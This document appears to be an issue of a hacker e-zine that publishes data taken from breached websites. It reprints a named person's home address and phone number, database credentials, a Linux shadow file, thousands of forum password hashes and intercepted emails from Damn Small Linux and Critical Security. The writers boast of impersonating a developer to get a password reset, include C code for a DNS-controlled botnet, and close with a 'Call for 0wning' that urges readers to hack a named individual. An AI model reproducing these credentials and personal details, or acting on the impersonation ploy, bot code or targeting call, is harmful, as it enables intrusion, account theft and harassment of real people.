YnNpdGUgZGVkaWNhdGVkIHRvIHRyYWluaW5nIHBlb3BsZSBpbiBXZWIgU2VjdXJpdHkuICBXZXZl
IGJlZW4gb3BlbiBmb3IgYWJvdXQgMyB5ZWFycyBub3cgYW5kIHdlcmUgaGF2aW5nIGEgY29uZmVy
ZW5jZSwgaW4gb3JsYW5kbyBmbG9yaWRhIHRoaXMgeWVhci4gIFdlIHdvdWxkIGxpa2UgdG8gaW5x
dWlyZSBvbiB3aGF0IGl0IHdvdWxkIHRha2UgdG8gaGF2ZSB5b3UgYXMgYSBzcGVha2VyIG9uIHNv
Y2lhbCBlbmdpbmVlcmluZy4gIFRoYW5rIFlvdS4KRU5EOnZDYXJkCg==
------=_Part_71926_18041514.1156350335275
Content-Type: text/plain; name=ATT00110.txt; charset=ANSI_X3.4-1968
Content-Transfer-Encoding: base64
X-Attachment-Id: 0.2
Content-Disposition: attachment; filename="ATT00110.txt"
Cg==
------=_Part_71926_18041514.1156350335275--
[penguin]$ ./base64.pl -f attachment.txt
Decoding attachment.txt...
BEGIN:vCard
VERSION:3.0
N:O'Shields;Christopher ;;;
FN:Christopher O'Shields
ORG:Enigma Group
ADR;:;;603 caborca ct
;ocoee;FL;34761;US;
TEL;TYPE=VOICE,MSG:4076412530
TEL;TYPE=FAX:
EMAIL;TYPE=INTERNET,PREF:psychomarine@gmail.com
NOTE;ENCODING=QUOTED-PRINTABLE:Simple really, I own a website dedicated to
training people in Web Security. Weve been open for about 3 years now and
were having a conference, in orlando florida this year. We would like to
inquire on what
it would take to have you as a speaker on social engineering. Thank You.
END:vCard
So, after all this, it looks like if this is the best, I'd rather be a noob.
}
sub Critical-Security {
In a day and age where computers hold sensitive personal information such as social
security numbers, credit card numbers, and passwords, society looks to those who
have a higher understanding of what needs to be done to prevent this information
from getting into the wrong hands. Security is such a Critical part of computing now
that we all must embrace it, understand it, and use it. Unfortunately there are
those who call themselves hackers, they claim they want to want to help the
community, and they claim to have a higher understanding of what needs to be done to
prevent such sensitive information from getting out to the public, but would you
really listen to these people when they cannot even prevent their own information
from leaking out to the public? The community I speak of is a community who call
themselves Critical Security.
And now the moment you've all been waiting for, les dossiers:
[penguin]$ cat config.php
<?php
$INFO['sql_driver'] = 'mysql';
$INFO['sql_host'] = 'mysql.criticalsecurity.net';
$INFO['sql_database'] = 'critical';
$INFO['sql_user'] = 'critsec';
$INFO['sql_pass'] = 'kd__2fd_b^svDja';
$INFO['sql_tbl_prefix'] = 'crtisec_';
$INFO['sql_debug'] = '0';
$INFO['board_start'] = '1135538877';
$INFO['installed'] = '1';
$INFO['php_ext'] = 'php';
$INFO['safe_mode'] = '0';
$INFO['board_url'] = 'http://www.criticalsecurity.net';
$INFO['admin_group'] = '4';
$INFO['guest_group'] = '2';
$INFO['member_group'] = '3';
$INFO['auth_group'] = '1';
$INFO['mysql_tbl_type'] = 'MyISAM';
$INFO['pre_closed'] = 'Closed: ';
?>
[penguin]$ echo Mmmmm.... Databases.
Mmmmm.... Databases.
[penguin]$ cat members_johnable.txt
ScriptBlue:$IPB2$2571604c52$ae0a8be0a87d052268ae831503100dec
buz:$IPB2$6c4c344a69$8d4d9dc4e2305a8d7f88b9fecd8b1a80
Xavier:$IPB2$234e414d453f$8e585fae0ee9635f7db87e22144fbb0d
(....)
thechaoscreator:$IPB2$29286a445a$3d8e59c4f11fdf7fda3c3c3d42cba36d
md5fungi:$IPB2$516952306b$6050c0e3c174d9939019ec4a0df83a60
highlyflamable:$IPB2$5e5d6e2f29$b989b666a012f4a4cdf1f99b0fbc4288
Perhaps Critical Security should rename themselves "Chimerical Security".
}
sub DamnSmallLinux {
In the flurry of bootable OS's over the past few years one has stood out above the
others. Being one of the most used and featured discs you would expect this site to
have a nicely locked down website. After all, it wouldn't take much time to add a
few 'advanced features' to the ISO now would it? A few collisions later and your ISO
is as good as 'new'. Going from a publicly re-knowned disc to a publicly owned disc
certainly wouldn't take much. Its probably secure though right?
Ladies and Gentlemen, I present to you, Damn Owned Linux.
[penguin]$ cat shadow
root:$1$qUJZH1Ec$Pofa16XbtN0U8fHNdH8kf0:13481:0:99999:7:::
bin:*:12510:0:99999:7:::
daemon:*:12510:0:99999:7:::
adm:*:12510:0:99999:7:::
lp:*:12510:0:99999:7:::
sync:*:12510:0:99999:7:::
shutdown:*:12510:0:99999:7:::
halt:*:12510:0:99999:7:::
mail:*:12510:0:99999:7:::
news:*:12510:0:99999:7:::
uucp:*:12510:0:99999:7:::
operator:*:12510:0:99999:7:::
games:*:12510:0:99999:7:::
gopher:*:12510:0:99999:7:::
ftp:*:12510:0:99999:7:::
nobody:*:12510:0:99999:7:::
vcsa:!!:12510:0:99999:7:::
rpm:!!:12510:0:99999:7:::
popa3d:!!:12510:0:99999:7:::
named:!!:12510:0:99999:7:::
apache:!!:12510:0:99999:7:::
webadmin:!!:12510:0:99999:7:::
mailnull:!!:12510:0:99999:7:::
smmsp:!!:12510:0:99999:7:::
sshd:!!:12510:0:99999:7:::
rpc:!!:12510:0:99999:7:::
pcap:!!:12510:0:99999:7:::
mysql:!!:12522::::::
john:$1$ga0tg6DC$cazuyhdRMa3CWjZxzzBRK.:13481:0:99999:7:::
robert:$1$H9Y4IEvq$R3y2bQVp7E22/obOtJdzM0:13520:0:99999:7:::
ke4nt:$1$ych0b4wO$gDiUE9XYxWTbH/dybhSMs1:13059:0:99999:7:::
extensions:$1$yRYmofxN$AIE.vRRqMc4JKhLCV.lwS1:13059:0:99999:7:::
chrisl:$1$g.6dOIPv$dn0ISxT5EbYt/sTvMGrgA/:13059:0:99999:7:::
orders:$1$E89NGR3h$O334PiMDjOYwhqazh5yAE0:12943:0:99999:7:::
saidinunleashed:$1$Bup24MQM$RuLC9OF7ct0QX4RA/TY4Q/:12948:0:99999:7:::
cdorders:$1$pMi0xxe7$NvzU41tKBOAIDs4y3upGN.:13059:0:99999:7:::
usborders:$1$BcM7M36D$NgUptJOyJSZ4adqypSlh51:13059:0:99999:7:::
antonina:$1$ugWHHPAz$5nJu9Vber10TPLhAxbiNf0:13178:0:99999:7:::
dsl:!!:13268:0:99999:7:::
[penguin]$ cat phpbbconfig.php
<?php
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
$dbms = 'mysql';
$dbhost = 'localhost';
$dbname = 'phpBB2';
$dbuser = 'phpBB2user';
$dbpasswd = 'dsl-n';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>
[penguin]$ cat wikiconfig.php
<?php
// config.php
//
// This file was generated by the install/configure.pl script based
// on values entered by the administrator. It contains the most
// common (and vital) configuration parameters for WikkiTikkiTavi to
// run.
//
// You may edit this file by hand or use configure.pl to generate a
// new copy.
//
// Certain other settings may be configured; look in lib/defaults.php
// to see them. Rather than changing them in lib/defaults.php, you
// should copy them from there to here. The settings here will safely
// over-ride those in lib/defaults.php.
// $Admin specifies the administrator e-mail address used in error messages.
$Admin = 'john@damnsmalllinux.org';
// If $DBPersist is not 0, persistent database connections will be used.
// Note that this is not supported by all hosting providers.
$DBPersist = 0;
// $DBServer indicates the hostname of the database server. It may be
// set to '' for the local host.
$DBServer = '';
// $DBName indicates the name of the database that the wiki should use.
$DBName = 'mywikidatabasename';
// $DBUser indicates the name of the database user.
$DBUser = 'wikiuser';
// $DBPasswd indicates the password to use for database access.
$DBPasswd = '4dslwiki4';
<snip snip>
Hmm..John, you sure do like numbers in your passwords.
[penguin]$ cat .htpasswd
storeadmin:APDj/CY5pGMhU
[penguin]$ wc -l forum.dsl.csv
14143 forum.dsl.csv
Hmm...
[penguin]$ cat forum.dsl.csv
fatcat:0b31f1aac4119df190588a5da544fea0
(....)
silencer51:f115599df7e7c2f49a530ae43043fec0
BryanLee:5099dd1f960d45225fcd7b3743a05141
zombek:4f2487061485f875f7f61a21786139ff
Clarence27:8330b1b53b8a0f7767d0a330fd5f17a3
reelbigjosh:b111a57597e6bf232dcca9d7e3c81322
goa:18f432991ba252df2f3e030603800b68
sylvaticus:22c01e370c24
After a while developing Damn Owned Linux got a little boring, I decided to have a
little fun with John and his admin/development team.
[penguin]$ cat email1.txt
From: robert.shingledecker@hushmail.com
To: john@damnsmalllinux.org
Date: Sat, 06 Jan 2007 14:56:54 +0000
This message is not encrypted, and is not digitally signed by
"robert.shingledecker@hushmail.com" <robert.shingledecker@hushmail.com> .
Hi John,
Late last night I decided to change a few of my passwords for
sources related to DSL. In my haste I managed to typo my 'passwd'
command after pasting in my complex password. Sometimes you have to
laugh.
Of course, I now cannot login to view my email, so would it be
possible for you to reset my password for me.
Also, did you read that email from Chris yet? Have you any ideas
about the problem he's having with Skype VOIP?
You can contact me on this address
(Robert.Shingledecker@hushmail.com)
Robert
[penguin]$ cat email2.txt
From: John@damnsmalllinux.org
To: robert.shingledecker@hushmail.com
Date: Sun, 07 Jan 2007 08:47:40 +0000
This message is not encrypted, and is not digitally signed by . Invite
John@damnsmalllinux.org to join Hushmail!
Hi Robert,
I reset your password to:
1robertpw2007
I don't know what is going on with him and sound. I do know that some of
the later Via chipsets don't have a working mic with DSL. Maybe he should
make sure it isn't a hardware issue first.
John
<snip snip>
Oh damn, you certainly slipped up there John. Hook, line and sinker.
Finally, please give your comments regarding DOL on the DSL forum. If you can spot
the 'new' features I'd like to know what you think of them.
Yours, Robert Shingledecker ;)
}
sub Lordabot {
/*
Ladies & gentlemen, children of all ages, LordApocolypse brings to you the future
of botnets ...
... The "LordaBot"
*/
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <stdio.h>
IN_ADDR iaddr;
int dohost();
void strip();
char *hostt1;
char Host1[512];
int ip11;
int ip12;
int ip13;
int ip14;
int ip21;
int ip22;
int ip23;
int ip24;
char Scanning_ip[32];
int main()
{
strcpy(Host1,"command_ip.somesite.com");
if (dohost() == 666)
{
printf("Some DNS error occured, fuck you!");
exit(1);
}
strip();
ip21 = ip11;
ip22 = ip12;
ip23 = ip13;
ip24 = ip14;
strcpy(Host1,"target_ip.somesite.com");
// dohost();
if (dohost() == 666)
{
printf("Some DNS error occured, fuck you!");
exit(1);
}
strip();
printf("o1: %i\n",ip11);
printf("o2: %i\n",ip12);
printf("o3: %i\n",ip13);
printf("o4: %i\n",ip14);
printf("d1: %i\n",ip21);
printf("d2: %i\n",ip22);
printf("d3: %i\n",ip23);
printf("d4: %i\n",ip24);
}
int dohost()
{
WSADATA WSData;
WSAStartup(MAKEWORD(1, 1), &WSData);
DWORD err;
LPHOSTENT lpHostEntry = NULL;
SOCKADDR_IN SockAddr;
SOCKET sock;
if ((sock = socket( AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
return 666;
// memset(&SockAddr, 0, sizeof(SockAddr));
SockAddr.sin_family = AF_INET;
iaddr.s_addr = inet_addr(Host1);
if (iaddr.s_addr == INADDR_NONE) lpHostEntry = gethostbyname(Host1);
//hostname
if (lpHostEntry == NULL && iaddr.s_addr == INADDR_NONE) //error dns
return 666;
if (lpHostEntry != NULL)
SockAddr.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list);
//hostname
else
SockAddr.sin_addr = iaddr; //ip address
hostt1 = inet_ntoa(SockAddr.sin_addr);
strcpy(Scanning_ip,hostt1);
printf("%s\n",Scanning_ip);
WSACleanup();
return 0;
}
void strip()
{
DWORD c,token,d,err;
char buf[4];
// memset(buf,0,sizeof(buf));
for (d=0,c=0,token=0;c<=strlen(Scanning_ip);c++)
{
if (Scanning_ip[c] == 46 || c == strlen(Scanning_ip)) {
srand(GetTickCount());
if (token == 0) {
if (strcmp(buf,"x") == 0) ip11 = (rand()%254);
else ip11 = atoi(buf);
}
if (token == 1) {
if (strcmp(buf,"x") == 0) ip12 = (rand()%254);
else ip12 = atoi(buf);
}
if (token == 2) {
if (strcmp(buf,"x") == 0) ip13 = (rand()%254);
else ip13 = atoi(buf);
}
if (token == 3) {
if (strcmp(buf,"x") == 0) ip14 = (rand()%254);
else ip14 = atoi(buf);
}
memset(buf,0,sizeof(buf));
d=0;
token++;
continue;
}
else {
buf[d] = Scanning_ip[c];
d++;
}
}
}
Now we got this little bugger out of Phorce's special library of code. The future of
botnets? Thank goodness the Phorce team came up with such an original idea, no one
would have ever thought of using DNS to control bots...
}
sub CF0 {
== CF0: Call for 0wning ==
Ladies and gentlemen, today we throw you a bone. This is how it works. We give a
name. If you own him, and do so before we do, then you win. You can ask us for some
kind of prize. Anyways, it is all in good fun, because this person needs to go down
either way.
== The Target ==
Your target is a shameless corporate tool. His name is Mark Hinge and his
contemporary nick is psg. Haven't heard of him? That's probably because he isn't
worth hearing about. But, if you would like some information, he kindly provides you
with some. Please visit the Wikipedia entry he wrote about himself,
http://en.wikipedia.org/wiki/Mark_Hinge. Notice how his article is long and
detailed. Also notice that he kindly provides links to his various pages, even
including his Myspace page, hoping to increase his hit counts. Notice how he lists
himself under the categories "Computer security specialists" and "Computer hacking".
Notice how his article is quite large in comparison to the articles about Matt
Blaze, Michael Lynn, Joanna Rutkowska, Johannes Ullrich, Michal Zalewski, among many
other "computer security specialists" of whom you are no doubt aware.
== His Accomplishments ==
Mark has been writing for shitty, content-lacking ezines since the 1990s, including
such advanced pieces as "Nameless Epitome" and "Murder in the Pump Room". Lately he
is the driving force and top employee of Whitedust, a computer news source, on which
he has written a few shitty papers that lack any technical content. If you are
unfamiliar with Whitedust, please take a look at whitedust.net or the Wikipedia
article on it, written by, surprise surprise, psg himself, at
http://en.wikipedia.org/wiki/Whitedust. One can also read the Wikipedia article he
wrote about SOL, at http://en.wikipedia.org/wiki/The_Syndicate_Of_London. Along with
these obvious acts of disinformation, psg found time to stick his name in the
article titled "Hacker".
Aside from these accomplishments, if they can be so termed, he has sold his soul.
== Why ==
Same old, same old. Mark misrepresents himself as a talented "hacker" who has been
part of "the scene" for an extended period of time, and thus as someone whose
opinion on security subjects matters. In reality, he merely has a layman's knowledge
of technical subjects. However, he is selling himself as a product, to ignorant
expert-seekers who know no better. Sooner or later psg is going to make all of us
look bad.
I think it is only fitting that a man who tries to bring so much positive attention
upon himself would by the same action bring considerable negative attention.
Frankly, I expect that if anyone bothers owning him, he will try to recover as
quickly as possible, and in the future present himself as having withstood the
onslaught of the underground, without mentioning his casualties.
So, we might as well make it hurt. Game on.
}
sub Contact {
Since we know you all enjoyed this issue very very much we setup an e-mail account
for you to send us your questions or comments, so feel free!
iLite@hushmail.com
}
